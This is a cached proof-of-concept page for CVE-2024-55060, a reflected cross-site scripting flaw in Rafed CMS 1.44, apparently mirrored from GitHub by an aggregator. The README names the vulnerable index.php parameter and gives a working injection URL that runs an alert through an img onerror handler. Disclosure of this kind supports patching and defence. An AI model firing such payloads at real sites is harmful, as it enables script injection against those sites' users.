CVE-2024-55060 PoC — Rafed CMS 安全漏洞

Source

https://github.com/bigzooooz/CVE-2024-55060

Associated Vulnerability

Title:Rafed CMS 安全漏洞 (CVE-2024-55060)
Description:Rafed CMS是Rafed公司的一个博客系统。 Rafed CMS 1.44版本存在安全漏洞，该漏洞源于跨站脚本漏洞，可能导致攻击者通过特制有效载荷执行任意Web脚本或HTML。

Readme

# CVE-2024-55060

Rafed CMS Website v1.44 - Cross Site Scripting (XSS)

#### Exploit Title: Rafed CMS Website v1.44 - Cross Site Scripting (XSS)
#### Date: 2024-03-12
#### CVE: CVE-2024-55060
#### Exploit Author: Abdulaziz Saad (@b4zb0z)
#### Vendor Homepage: https://www.rafed-system.org/
#### Software Link: N/A
#### Version: 1.44
#### Tested on: Apache, Linux

-----

#### [#] Vulnerability Location:

  `index.php?">{XSS_Payload]` in `index.php`

----

#### [#] Exploitation:

  `https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E`

File Snapshot


 [4.0K]  /data/pocs/bc5cfe1b3714dd06dec44e7807e938f30fa2e7e7
└── [ 547]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!